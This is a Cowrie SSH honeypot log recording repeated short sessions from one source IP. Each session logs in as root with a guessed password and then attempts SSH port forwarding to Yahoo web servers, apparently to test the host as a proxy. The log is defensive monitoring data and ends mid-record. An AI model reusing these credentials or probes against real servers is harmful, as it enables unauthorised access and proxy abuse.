{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:08:09.598153Z","src_ip":"213.209.150.239","session":"edc0397a0b95"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:08:09.654769Z","src_ip":"213.209.150.239","session":"edc0397a0b95"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:08:09.936918Z","src_ip":"213.209.150.239","session":"edc0397a0b95"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":14269,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:14269","sensor":"my-vps","timestamp":"2025-08-26T01:08:09.994492Z","session":"edc0397a0b95"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:10.051505Z","src_ip":"213.209.150.239","session":"edc0397a0b95"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":24468,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:24468","sensor":"my-vps","timestamp":"2025-08-26T01:08:10.207110Z","session":"edc0397a0b95"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:10.263850Z","src_ip":"213.209.150.239","session":"edc0397a0b95"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:08:10.321406Z","src_ip":"213.209.150.239","session":"edc0397a0b95"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":51687,"dst_ip":"1.2.3.4","dst_port":22,"session":"bfd4639bcafc","protocol":"ssh","message":"New connection: 213.209.150.239:51687 (1.2.3.4:22) [session: bfd4639bcafc]","sensor":"my-vps","timestamp":"2025-08-26T01:08:10.376905Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:08:10.385908Z","src_ip":"213.209.150.239","session":"bfd4639bcafc"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:08:10.433479Z","src_ip":"213.209.150.239","session":"bfd4639bcafc"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:08:10.716180Z","src_ip":"213.209.150.239","session":"bfd4639bcafc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":31380,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:31380","sensor":"my-vps","timestamp":"2025-08-26T01:08:10.774035Z","session":"bfd4639bcafc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:10.830605Z","src_ip":"213.209.150.239","session":"bfd4639bcafc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":14818,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:14818","sensor":"my-vps","timestamp":"2025-08-26T01:08:10.987160Z","session":"bfd4639bcafc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:11.043915Z","src_ip":"213.209.150.239","session":"bfd4639bcafc"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:08:11.101336Z","src_ip":"213.209.150.239","session":"bfd4639bcafc"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":51763,"dst_ip":"1.2.3.4","dst_port":22,"session":"adf2e387d208","protocol":"ssh","message":"New connection: 213.209.150.239:51763 (1.2.3.4:22) [session: adf2e387d208]","sensor":"my-vps","timestamp":"2025-08-26T01:08:11.147450Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:08:11.148416Z","src_ip":"213.209.150.239","session":"adf2e387d208"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:08:11.195428Z","src_ip":"213.209.150.239","session":"adf2e387d208"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:08:11.430905Z","src_ip":"213.209.150.239","session":"adf2e387d208"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":15124,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:15124","sensor":"my-vps","timestamp":"2025-08-26T01:08:11.478943Z","session":"adf2e387d208"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:11.526589Z","src_ip":"213.209.150.239","session":"adf2e387d208"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":9523,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:9523","sensor":"my-vps","timestamp":"2025-08-26T01:08:11.661574Z","session":"adf2e387d208"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:11.708673Z","src_ip":"213.209.150.239","session":"adf2e387d208"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:08:11.756697Z","src_ip":"213.209.150.239","session":"adf2e387d208"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":51833,"dst_ip":"1.2.3.4","dst_port":22,"session":"9825af7908d0","protocol":"ssh","message":"New connection: 213.209.150.239:51833 (1.2.3.4:22) [session: 9825af7908d0]","sensor":"my-vps","timestamp":"2025-08-26T01:08:11.811999Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:08:11.812924Z","src_ip":"213.209.150.239","session":"9825af7908d0"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:08:11.869661Z","src_ip":"213.209.150.239","session":"9825af7908d0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:08:12.151926Z","src_ip":"213.209.150.239","session":"9825af7908d0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":31494,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:31494","sensor":"my-vps","timestamp":"2025-08-26T01:08:12.209373Z","session":"9825af7908d0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:12.266253Z","src_ip":"213.209.150.239","session":"9825af7908d0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":13477,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:13477","sensor":"my-vps","timestamp":"2025-08-26T01:08:12.423063Z","session":"9825af7908d0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:12.480063Z","src_ip":"213.209.150.239","session":"9825af7908d0"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:08:12.538186Z","src_ip":"213.209.150.239","session":"9825af7908d0"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":51905,"dst_ip":"1.2.3.4","dst_port":22,"session":"701039c728a1","protocol":"ssh","message":"New connection: 213.209.150.239:51905 (1.2.3.4:22) [session: 701039c728a1]","sensor":"my-vps","timestamp":"2025-08-26T01:08:12.593576Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:08:12.594281Z","src_ip":"213.209.150.239","session":"701039c728a1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:08:12.651124Z","src_ip":"213.209.150.239","session":"701039c728a1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:08:12.933216Z","src_ip":"213.209.150.239","session":"701039c728a1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":667,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:667","sensor":"my-vps","timestamp":"2025-08-26T01:08:12.991104Z","session":"701039c728a1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:13.047761Z","src_ip":"213.209.150.239","session":"701039c728a1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":28453,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:28453","sensor":"my-vps","timestamp":"2025-08-26T01:08:13.203102Z","session":"701039c728a1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:13.259745Z","src_ip":"213.209.150.239","session":"701039c728a1"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:08:13.317214Z","src_ip":"213.209.150.239","session":"701039c728a1"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":51978,"dst_ip":"1.2.3.4","dst_port":22,"session":"c52d5ba199b1","protocol":"ssh","message":"New connection: 213.209.150.239:51978 (1.2.3.4:22) [session: c52d5ba199b1]","sensor":"my-vps","timestamp":"2025-08-26T01:08:13.363648Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:08:13.373660Z","src_ip":"213.209.150.239","session":"c52d5ba199b1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac